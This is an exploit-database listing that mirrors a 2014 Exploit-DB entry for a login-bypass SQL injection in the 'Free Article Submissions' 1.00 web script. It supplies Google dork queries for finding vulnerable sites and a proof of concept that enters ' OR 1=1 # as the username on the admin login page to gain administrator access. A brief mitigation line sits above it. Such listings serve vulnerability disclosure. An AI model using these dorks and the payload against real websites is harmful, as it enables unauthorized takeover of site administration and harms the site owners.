header-logo
Suggest Exploit
vendor:
Free Article Submissions
by:
BarrabravaZ
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Free Article Submissions
Affected Version From: 1.00
Affected Version To: 1.00
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2014

Free Article Submissions SQL Injection Vulnerability

The remote attacker has the possibility to manage the website. The remote attacker is able to login into website with access level as admin.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Free Article Submissions SQL Injection Vulnerability
# Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal"
               inurl:/category.php?id=2 "Arts & Entertainment"
# Date: 07/12/2014
# Exploit Author: BarrabravaZ
# Vendor Homepage: http://www.articlesetup.com/
# Software Link: [download link if available]
# Version: 1.00
# Tested on: Windows

 
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 «««:»»»          Author will be not responsible for any damage.          «««:»»»
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
x
x Issue: 
x SQL Injection Bypass Login
x 
x Risk level: High
x ~ The remote attacker has the possibility to manage the website.
x ~ The remote attacker is able to login into website with access level as admin.
x 
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
##
## Proof Of Concept:
## http://127.0.0.1/admin/login.php
##
## Username :  ' OR 1=1 #
## Password :  barrabravaz
##
##
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Special thanks to:
[+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX
[+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Navigation

Suggest Exploit

Services By CQR